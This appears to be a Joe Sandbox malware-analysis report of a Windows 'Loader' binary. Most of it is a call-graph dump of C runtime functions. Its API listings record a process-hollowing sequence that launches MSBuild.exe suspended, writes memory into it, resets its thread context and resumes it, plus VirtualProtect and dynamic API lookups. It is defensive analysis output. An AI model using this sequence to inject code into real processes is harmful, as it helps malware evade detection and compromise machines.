17989->17988 17989->17990 17990->17986 17992 d374f3 17991->17992 17993 d374fa 17991->17993 18039 d41d3f 17992->18039 17995 d33202 17993->17995 18044 d39c58 EnterCriticalSection 17993->18044 17997 d33990 17995->17997 17998 d339b2 17997->17998 17999 d339ee 17997->17999 18000 d374e4 std::_Lockit::_Lockit 7 API calls 17998->18000 18001 d371d1 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 17999->18001 18002 d339c3 18000->18002 18003 d33a00 18001->18003 18004 d37515 std::_Lockit::~_Lockit 2 API calls 18002->18004 18003->17957 18004->17999 18013 d33aff 18012->18013 18021 d33272 18012->18021 18013->18021 18040 d4660b std::_Lockit::_Lockit 5 API calls 18039->18040 18041 d41d44 18040->18041 18042 d41d11 std::_Lockit::_Lockit EnterCriticalSection 18041->18042 18043 d41d4b 18042->18043 18043->17995 18044->17995 18129 d34e30 18126->18129 18130 d34e74 18129->18130 18131 d34f1c 18129->18131 18134 d3a45c CallUnexpected RaiseException 18130->18134 18135 d34e94 18130->18135 18132 d371d1 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 18131->18132 18133 d318d9 18132->18133 18133->17979 18134->18135 18136 d34f30 std::ios_base::_Init 38 API calls 18135->18136 18137 d34eef 18136->18137 18138 d34f70 std::ios_base::_Init 30 API calls 18137->18138 18139 d34f04 18138->18139 18146 d32159 18145->18146 18149 d3d388 18146->18149 18148 d31b3b 18148->17897 18150 d3d39c _Fputc 18149->18150 18151 d3d3be 18150->18151 18153 d3d3e5 18150->18153 18152 d41ba8 __strnicoll 29 API calls 18151->18152 18155 d3d3d9 _Fputc 18152->18155 18156 d3eb3d 18153->18156 18155->18148 18157 d3eb49 ___scrt_is_nonwritable_in_current_image 18156->18157 18158 d3d13f _Ungetc EnterCriticalSection 18157->18158 18159 d3eb57 18158->18159 18160 d3e512 79 API calls 18159->18160 18161 d3eb64 18160->18161 18162 d3eb8c LeaveCriticalSection 18161->18162 18163 d3eb75 18162->18163 18163->18155 18165 d32244 std::ios_base::_Init 18164->18165 18166 d313d2 18165->18166 18168 d32320 18165->18168 18166->17846 18171 d32350 18168->18171 18170 d32344 18170->18166 18172 d3237b codecvt 18171->18172 18173 d32369 18171->18173 18172->18170 18174 d323a0 std::ios_base::_Init 29 API calls 18173->18174 18174->18172 18176 d3f303 18175->18176 18177 d3f2f1 18175->18177 18187 d3f45e 18176->18187 18178 d39a20 CallUnexpected GetModuleHandleW 18177->18178 18180 d3f2f6 18178->18180 18180->18176 18202 d3f1f8 GetModuleHandleExW 18180->18202 18182 d3a2cb 18182->16748 18188 d3f46a ___scrt_is_nonwritable_in_current_image 18187->18188 18208 d41d11 EnterCriticalSection 18188->18208 18190 d3f474 18209 d3f35b 18190->18209 18192 d3f481 18213 d3f49f 18192->18213 18195 d3f293 18238 d3f27a 18195->18238 18197 d3f29d 18198 d3f2b1 18197->18198 18199 d3f2a1 GetCurrentProcess TerminateProcess 18197->18199 18200 d3f1f8 CallUnexpected 3 API calls 18198->18200 18199->18198 18201 d3f2b9 ExitProcess 18200->18201 18203 d3f237 GetProcAddress 18202->18203 18204 d3f258 18202->18204 18203->18204 18205 d3f24b 18203->18205 18206 d3f267 18204->18206 18207 d3f25e FreeLibrary 18204->18207 18205->18204 18206->18176 18207->18206 18208->18190 18210 d3f367 ___scrt_is_nonwritable_in_current_image CallUnexpected 18209->18210 18211 d3f3cb CallUnexpected 18210->18211 18216 d4102e 18210->18216 18211->18192 18237 d41d28 LeaveCriticalSection 18213->18237 18215 d3f33a 18215->18182 18215->18195 18217 d4103a __EH_prolog3 18216->18217 18220 d412b9 18217->18220 18219 d41061 std::ios_base::_Init 18219->18211 18221 d412c5 ___scrt_is_nonwritable_in_current_image 18220->18221 18228 d41d11 EnterCriticalSection 18221->18228 18223 d412d3 18229 d41184 18223->18229 18228->18223 18230 d411a3 18229->18230 18231 d4119b 18229->18231 18230->18231 18232 d456b7 ___free_lconv_mon 14 API calls 18230->18232 18233 d41308 18231->18233 18232->18231 18236 d41d28 LeaveCriticalSection 18233->18236 18235 d412f1 18235->18219 18236->18235 18237->18215 18241 d48f4a 18238->18241 18240 d3f27f CallUnexpected 18240->18197 18242 d48f59 CallUnexpected 18241->18242 18243 d48f66 18242->18243 18245 d465c0 18242->18245 18243->18240 18246 d4670d std::_Lockit::_Lockit 5 API calls 18245->18246 18247 d465dc 18246->18247 18247->18243 18249 d3d0bd 18248->18249 18251 d3d0cf ___scrt_uninitialize_crt 18248->18251 18250 d3d0cb 18249->18250 18253 d4217a 18249->18253 18250->16742 18251->16742 18256 d422a5 18253->18256 18259 d4237e 18256->18259 18260 d4238a ___scrt_is_nonwritable_in_current_image 18259->18260 18267 d41d11 EnterCriticalSection 18260->18267 18262 d42400 18276 d4241e 18262->18276 18264 d42394 ___scrt_uninitialize_crt 18264->18262 18268 d422f2 18264->18268 18267->18264 18269 d422fe ___scrt_is_nonwritable_in_current_image 18268->18269 18279 d3d13f EnterCriticalSection 18269->18279 18271 d42308 ___scrt_uninitialize_crt 18392 d41d28 LeaveCriticalSection 18276->18392 18278 d42181 18278->18250 18279->18271 18392->18278 21108 d38b50 21109 d38b59 21108->21109 21110 d38b8e 21108->21110 21109->21110 21113 d42127 21109->21113 21112 d38b81 21114 d42139 21113->21114 21117 d42142 ___scrt_uninitialize_crt 21113->21117 21115 d422a5 ___scrt_uninitialize_crt 77 API calls 21114->21115 21116 d4213f 21115->21116 21116->21112 21118 d42151 21117->21118 21121 d4242a 21117->21121 21118->21112 21122 d42436 ___scrt_is_nonwritable_in_current_image 21121->21122 21129 d3d13f EnterCriticalSection 21122->21129 21124 d42444 21125 d42183 ___scrt_uninitialize_crt 77 API calls 21124->21125 21126 d42455 21125->21126 21130 d4247e 21126->21130 21129->21124 21133 d3d153 LeaveCriticalSection 21130->21133 21132 d42178 21132->21112 21133->21132 19389 d3d240 19390 d4217a ___scrt_uninitialize_crt 77 API calls 19389->19390 19391 d3d248 19390->19391 19399 d47ef2 19391->19399 19393 d3d24d 19394 d47f9d 14 API calls 19393->19394 19395 d3d25c DeleteCriticalSection 19394->19395 19395->19393 19396 d3d277 19395->19396 19397 d456b7 ___free_lconv_mon 14 API calls 19396->19397 19398 d3d282 19397->19398 19400 d47efe ___scrt_is_nonwritable_in_current_image 19399->19400 19409 d41d11 EnterCriticalSection 19400->19409 19402 d47f09 19403 d47f75 19402->19403 19406 d47f49 DeleteCriticalSection 19402->19406 19410 d41fd2 19402->19410 19414 d47f94 19403->19414 19408 d456b7 ___free_lconv_mon 14 API calls 19406->19408 19408->19402 19409->19402 19411 d41fe5 _Fputc 19410->19411 19417 d42090 19411->19417 19413 d41ff1 _Fputc 19413->19402 19489 d41d28 LeaveCriticalSection 19414->19489 19416 d47f81 19416->19393 19418 d4209c ___scrt_is_nonwritable_in_current_image 19417->19418 19419 d420a6 19418->19419 19420 d420c9 19418->19420 19421 d41ba8 __strnicoll 29 API calls 19419->19421 19427 d420c1 19420->19427 19428 d3d13f EnterCriticalSection 19420->19428 19421->19427 19423 d420e7 19429 d42002 19423->19429 19425 d420f4 19443 d4211f 19425->19443 19427->19413 19428->19423 19430 d42032 19429->19430 19431 d4200f 19429->19431 19433 d421e8 ___scrt_uninitialize_crt 73 API calls 19430->19433 19441 d4202a 19430->19441 19432 d41ba8 __strnicoll 29 API calls 19431->19432 19432->19441 19434 d4204a 19433->19434 19435 d47f9d 14 API calls 19434->19435 19436 d42052 19435->19436 19437 d48e44 _Ungetc 29 API calls 19436->19437 19438 d4205e 19437->19438 19446 d4d116 19438->19446 19441->19425 19442 d456b7 ___free_lconv_mon 14 API calls 19442->19441 19488 d3d153 LeaveCriticalSection 19443->19488 19445 d42125 19445->19427 19447 d42065 19446->19447 19448 d4d13f 19446->19448 19447->19441 19447->19442 19449 d4d18e 19448->19449 19451 d4d166 19448->19451 19450 d41ba8 __strnicoll 29 API calls 19449->19450 19450->19447 19453 d4d1b9 19451->19453 19454 d4d1c5 ___scrt_is_nonwritable_in_current_image 19453->19454 19461 d4d018 EnterCriticalSection 19454->19461 19456 d4d1d3 19457 d4d204 19456->19457 19462 d4d076 19456->19462 19475 d4d23e 19457->19475 19461->19456 19463 d4cdcf _Fputc 29 API calls 19462->19463 19465 d4d086 19463->19465 19464 d4d08c 19478 d4ce39 19464->19478 19465->19464 19467 d4cdcf _Fputc 29 API calls 19465->19467 19474 d4d0be 19465->19474 19469 d4d0b5 19467->19469 19468 d4cdcf _Fputc 29 API calls 19470 d4d0ca CloseHandle 19468->19470 19471 d4cdcf _Fputc 29 API calls 19469->19471 19470->19464 19472 d4d0d6 GetLastError 19470->19472 19471->19474 19472->19464 19473 d4d0e4 _Fputc 19473->19457 19474->19464 19474->19468 19487 d4d03b LeaveCriticalSection 19475->19487 19477 d4d227 19477->19447 19479 d4ceaf 19478->19479 19480 d4ce48 19478->19480 19481 d41314 __dosmaperr 14 API calls 19479->19481 19480->19479 19486 d4ce72 19480->19486 19482 d4ceb4 19481->19482 19483 d41327 __dosmaperr 14 API calls 19482->19483 19484 d4ce9f 19483->19484 19484->19473 19485 d4ce99 SetStdHandle 19485->19484 19486->19484 19486->19485 19487->19477 19488->19445 19489->19416 19600 d47041 19601 d4705c ___scrt_is_nonwritable_in_current_image 19600->19601 19612 d41d11 EnterCriticalSection 19601->19612 19603 d47063 19613 d4cf7a 19603->19613 19606 d47081 19632 d470a7 19606->19632 19611 d47192 2 API calls 19611->19606 19612->19603 19614 d4cf86 ___scrt_is_nonwritable_in_current_image 19613->19614 19615 d4cfb0 19614->19615 19616 d4cf8f 19614->19616 19635 d41d11 EnterCriticalSection 19615->19635 19617 d41314 __dosmaperr 14 API calls 19616->19617 19619 d4cf94 19617->19619 19620 d419ff __strnicoll 29 API calls 19619->19620 19621 d47072 19620->19621 19621->19606 19626 d470dc GetStartupInfoW 19621->19626 19622 d4cfe8 19643 d4d00f 19622->19643 19625 d4cfbc 19625->19622 19636 d4ceca 19625->19636 19627 d470f9 19626->19627 19629 d4707c 19626->19629 19628 d4cf7a 30 API calls 19627->19628 19627->19629 19631 d47121 19628->19631 19629->19611 19630 d47151 GetFileType 19630->19631 19631->19629 19631->19630 19647 d41d28 LeaveCriticalSection 19632->19647 19634 d47092 19635->19625 19637 d469f4 __dosmaperr 14 API calls 19636->19637 19639 d4cedc 19637->19639 19638 d4cee9 19640 d456b7 ___free_lconv_mon 14 API calls 19638->19640 19639->19638 19641 d46470 6 API calls 19639->19641 19642 d4cf3e 19640->19642 19641->19639 19642->19625 19646 d41d28 LeaveCriticalSection 19643->19646 19645 d4d016 19645->19621 19646->19645 19647->19634 19842 d38a60 19843 d38a82 19842->19843 19847 d38a97 19842->19847 19848 d38bf5 19843->19848 19851 d38c10 19848->19851 19853 d38c61 19848->19853 19849 d371d1 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 19850 d38a87 19849->19850 19850->19847 19854 d42a79 19850->19854 19852 d42ab4 78 API calls 19851->19852 19851->19853 19852->19853 19853->19849 19855 d42a84 19854->19855 19856 d42a99 19854->19856 19857 d41314 __dosmaperr 14 API calls 19855->19857 19856->19855 19858 d42aa0 19856->19858 19859 d42a89 19857->19859 19864 d413c4 19858->19864 19861 d419ff __strnicoll 29 API calls 19859->19861 19863 d42a94 19861->19863 19862 d42aaf 19862->19847 19863->19847 19865 d413d7 _Fputc 19864->19865 19868 d4163d 19865->19868 19867 d413ec _Fputc 19867->19862 19870 d41649 ___scrt_is_nonwritable_in_current_image 19868->19870 19869 d4164f 19871 d41ba8 __strnicoll 29 API calls 19869->19871 19870->19869 19873 d41692 19870->19873 19872 d4166a 19871->19872 19872->19867 19879 d3d13f EnterCriticalSection 19873->19879 19875 d4169e 19880 d41551 19875->19880 19877 d416b4 19891 d416dd 19877->19891 19879->19875 19881 d41564 19880->19881 19882 d41577 19880->19882 19881->19877 19894 d41478 19882->19894 19884 d41628 19884->19877 19885 d415b5 19888 d421e8 ___scrt_uninitialize_crt 73 API calls 19885->19888 19886 d4159a 19886->19884 19886->19885 19898 d4c36c 19886->19898 19889 d415c8 19888->19889 19912 d4c152 19889->19912 19963 d3d153 LeaveCriticalSection 19891->19963 19893 d416e5 19893->19872 19895 d41489 19894->19895 19897 d414e1 19894->19897 19895->19897 19915 d4c112 19895->19915 19897->19886 19899 d4c73e 19898->19899 19900 d4c775 19899->19900 19901 d4c74d 19899->19901 19903 d48e44 _Ungetc 29 API calls 19900->19903 19902 d41ba8 __strnicoll 29 API calls 19901->19902 19904 d4c768 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 19902->19904 19905 d4c77e 19903->19905 19904->19885 19925 d4c170 19905->19925 19908 d4c828 19928 d4c3c8 19908->19928 19909 d4c83f 19909->19904 19940 d4c573 19909->19940 19913 d4c2b3 _Fputc 31 API calls 19912->19913 19914 d4c16b 19913->19914 19914->19884 19916 d4c126 _Fputc 19915->19916 19919 d4c2b3 19916->19919 19918 d4c13b _Fputc 19918->19897 19920 d4cdcf _Fputc 29 API calls 19919->19920 19921 d4c2c5 19920->19921 19922 d4c2e1 SetFilePointerEx 19921->19922 19923 d4c2cd _Fputc 19921->19923 19922->19923 19924 d4c2f9 GetLastError 19922->19924 19923->19918 19924->19923 19947 d4c18e 19925->19947 19929 d4c3d7 _Fputc 19928->19929 19930 d48e44 _Ungetc 29 API calls 19929->19930 19932 d4c3f3 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 19930->19932 19931 d371d1 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 19933 d4c571 19931->19933 19934 d4c170 33 API calls 19932->19934 19939 d4c3ff 19932->19939 19933->19904 19935 d4c453 19934->19935 19936 d4c485 ReadFile 19935->19936 19935->19939 19937 d4c4ac 19936->19937 19936->19939 19938 d4c170 33 API calls 19937->19938 19938->19939 19939->19931 19941 d48e44 _Ungetc 29 API calls 19940->19941 19942 d4c586 19941->19942 19943 d4c5d0 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 19942->19943 19944 d4c170 33 API calls 19942->19944 19943->19904 19945 d4c62d 19944->19945 19945->19943 19946 d4c170 33 API calls 19945->19946 19946->19943 19949 d4c19a ___scrt_is_nonwritable_in_current_image 19947->19949 19948 d4c189 19948->19904 19948->19908 19948->19909 19949->19948 19950 d4c1dd 19949->19950 19952 d4c223 19949->19952 19951 d41ba8 __strnicoll 29 API calls 19950->19951 19951->19948 19958 d4d018 EnterCriticalSection 19952->19958 19954 d4c229 19955 d4c24a 19954->19955 19956 d4c2b3 _Fputc 31 API calls 19954->19956 19959 d4c2ab 19955->19959 19956->19955 19958->19954 19962 d4d03b LeaveCriticalSection 19959->19962 19961 d4c2b1 19961->19948 19962->19961 19963->19893 20005 d47600 20008 d41d28 LeaveCriticalSection 20005->20008 20007 d47607 20008->20007

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00D60110,00D60100), ref: 00D60334
                                                                                                  • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00D60347
                                                                                                  • Wow64GetThreadContext.KERNEL32(00000100,00000000), ref: 00D60365
                                                                                                  • ReadProcessMemory.KERNELBASE(00000104,?,00D60154,00000004,00000000), ref: 00D60389
                                                                                                  • VirtualAllocEx.KERNELBASE(00000104,?,?,00003000,00000040), ref: 00D603B4
                                                                                                  • WriteProcessMemory.KERNELBASE(00000104,00000000,?,?,00000000,?), ref: 00D6040C
                                                                                                  • WriteProcessMemory.KERNELBASE(00000104,00400000,?,?,00000000,?,00000028), ref: 00D60457
                                                                                                  • WriteProcessMemory.KERNELBASE(00000104,?,?,00000004,00000000), ref: 00D60495
                                                                                                  • Wow64SetThreadContext.KERNEL32(00000100,00430000), ref: 00D604D1
                                                                                                  • ResumeThread.KERNELBASE(00000100), ref: 00D604E0
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                                                                  • API String ID: 2687962208-3857624555
                                                                                                  • Opcode ID: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                                  • Instruction ID: 8699c3233706eef83de3a593c2db31be48ad706b8424807beb0e16e2822c11cd
                                                                                                  • Opcode Fuzzy Hash: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                                  • Instruction Fuzzy Hash: F1B1097264064AAFDB60CF68CC80BDA77A5FF88714F158164EA0CAB341D774FA51CBA4

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$AddressCloseCreateHandleProcSize
                                                                                                  • String ID: CreateFileA
                                                                                                  • API String ID: 2547132502-1429953656
                                                                                                  • Opcode ID: 4c7517ec2b4ed84a80a23f6ffb545f2e7db7fec9c4bef088de2e260d11bbc5b1
                                                                                                  • Instruction ID: 9ced4854466b94e310d836d3756a39455da84b23b0bbf02b7e6ea236ac85a499
                                                                                                  • Opcode Fuzzy Hash: 4c7517ec2b4ed84a80a23f6ffb545f2e7db7fec9c4bef088de2e260d11bbc5b1
                                                                                                  • Instruction Fuzzy Hash: FD41B5B4D083099FCB04EFA8D4986AEBBF0EF49315F048529E899E7350D7749545CFA2

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 42 d46642-d4664e 43 d466e0-d466e3 42->43 44 d46653-d46664 43->44 45 d466e9 43->45 47 d46666-d46669 44->47 48 d46671-d4668a LoadLibraryExW 44->48 46 d466eb-d466ef 45->46 49 d4666f 47->49 50 d46709-d4670b 47->50 51 d466f0-d46700 48->51 52 d4668c-d46695 GetLastError 48->52 54 d466dd 49->54 50->46 51->50 53 d46702-d46703 FreeLibrary 51->53 55 d46697-d466a9 call d49d04 52->55 56 d466ce-d466db 52->56 53->50 54->43 55->56 59 d466ab-d466bd call d49d04 55->59 56->54 59->56 62 d466bf-d466cc LoadLibraryExW 59->62 62->51 62->56
                                                                                                  APIs
                                                                                                  • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,00000000,?,00DC7F77,?,00D46751,00000000,00000000,00000000,00000000), ref: 00D46703
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FreeLibrary
                                                                                                  • String ID: api-ms-$ext-ms-
                                                                                                  • API String ID: 3664257935-537541572
                                                                                                  • Opcode ID: 5ea059118a21a2bab98ed301419ca2ecf58d7646e8a24b2bcd074a5b03cf9cdf
                                                                                                  • Instruction ID: e5a707df0560b4bd2020fbd37777e3ea9b9e7c5905af68f184b3d023081109dc
                                                                                                  • Opcode Fuzzy Hash: 5ea059118a21a2bab98ed301419ca2ecf58d7646e8a24b2bcd074a5b03cf9cdf
                                                                                                  • Instruction Fuzzy Hash: CC210A32A01320ABC735AB65DC45A5A7768DB42771F2A0150FD07E7391EB70EE00DAF2

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressConsoleFreeHandleModuleProc
                                                                                                  • String ID: FreeConsole$kernel32.dll
                                                                                                  • API String ID: 1635486814-2564406000
                                                                                                  • Opcode ID: 2016b84e7c3406486cc17a8fcdd8eac3ba95a470cdecb385b44dbd97af8ab675
                                                                                                  • Instruction ID: a7490486963df065302b76c098ad7f38ca6a064f4f5e8cb866b260b06e357f5f
                                                                                                  • Opcode Fuzzy Hash: 2016b84e7c3406486cc17a8fcdd8eac3ba95a470cdecb385b44dbd97af8ab675
                                                                                                  • Instruction Fuzzy Hash: 2C0166B0E043089FCB44EFB8D94559DBBF4EB48301F41856AE849D7351EB74A6548FA2

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 68 d46e2a-d46e43 69 d46e45-d46e55 call d3f15d 68->69 70 d46e59-d46e5e 68->70 69->70 76 d46e57 69->76 72 d46e60-d46e68 70->72 73 d46e6b-d46e91 call d4573f 70->73 72->73 78 d47007-d47018 call d371d1 73->78 79 d46e97-d46ea2 73->79 76->70 81 d46ea8-d46ead 79->81 82 d46ffa 79->82 84 d46ec6-d46ed1 call d456f1 81->84 85 d46eaf-d46eb8 call d39f70 81->85 86 d46ffc 82->86 84->86 94 d46ed7 84->94 85->86 95 d46ebe-d46ec4 85->95 89 d46ffe-d47005 call d39f07 86->89 89->78 96 d46edd-d46ee2 94->96 95->96 96->86 97 d46ee8-d46efd call d4573f 96->97 97->86 100 d46f03-d46f15 call d464f3 97->100 102 d46f1a-d46f1e 100->102 102->86 103 d46f24-d46f2c 102->103 104 d46f66-d46f72 103->104 105 d46f2e-d46f33 103->105 106 d46f74-d46f76 104->106 107 d46fef 104->107 105->89 108 d46f39-d46f3b 105->108 109 d46f78-d46f81 call d39f70 106->109 110 d46f8b-d46f96 call d456f1 106->110 111 d46ff1-d46ff8 call d39f07 107->111 108->86 112 d46f41-d46f5b call d464f3 108->112 109->111 122 d46f83-d46f89 109->122 110->111 123 d46f98 110->123 111->86 112->89 121 d46f61 112->121 121->86 124 d46f9e-d46fa3 122->124 123->124 124->111 125 d46fa5-d46fbd call d464f3 124->125 125->111 128 d46fbf-d46fc6 125->128 129 d46fe7-d46fed 128->129 130 d46fc8-d46fc9 128->130 131 d46fca-d46fdc call d45801 129->131 130->131 131->111 134 d46fde-d46fe5 call d39f07 131->134 134->89
                                                                                                  APIs
                                                                                                  • __alloca_probe_16.LIBCMT ref: 00D46EAF
                                                                                                  • __alloca_probe_16.LIBCMT ref: 00D46F78
                                                                                                  • __freea.LIBCMT ref: 00D46FDF
                                                                                                    • Part of subcall function 00D456F1: RtlAllocateHeap.NTDLL(00000000,00D47675,?,?,00D47675,00000220,?,?,?), ref: 00D45723
                                                                                                  • __freea.LIBCMT ref: 00D46FF2
                                                                                                  • __freea.LIBCMT ref: 00D46FFF
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                                  • String ID:
                                                                                                  • API String ID: 1423051803-0
                                                                                                  • Opcode ID: 783123bdf89d4cb1c42dfc80df6de212082a5b9fdd2d4c07e36eccd10862b833
                                                                                                  • Instruction ID: f117788a03bf22b92fca1f6e2ed31357fbff232d0f9cbaf87a4925d3b4c0db59
                                                                                                  • Opcode Fuzzy Hash: 783123bdf89d4cb1c42dfc80df6de212082a5b9fdd2d4c07e36eccd10862b833
                                                                                                  • Instruction Fuzzy Hash: E851D2B2600246AFDB249F64EC81EBB7BA9EF46750F190039FD46D6111EB71DC1486B2

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 137 d31db0-d31e7e call d31000 * 2 GetProcAddress 142 d31e84-d31e8c 137->142 143 d31e8f-d31ecb VirtualProtect 137->143 142->143 145 d31ed1-d31ed7 call d31bd0 143->145 146 d31edc-d31ef3 call d371d1 143->146 145->146
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressProcProtectVirtual
                                                                                                  • String ID: @$VirtualProtect
                                                                                                  • API String ID: 3759838892-29487290
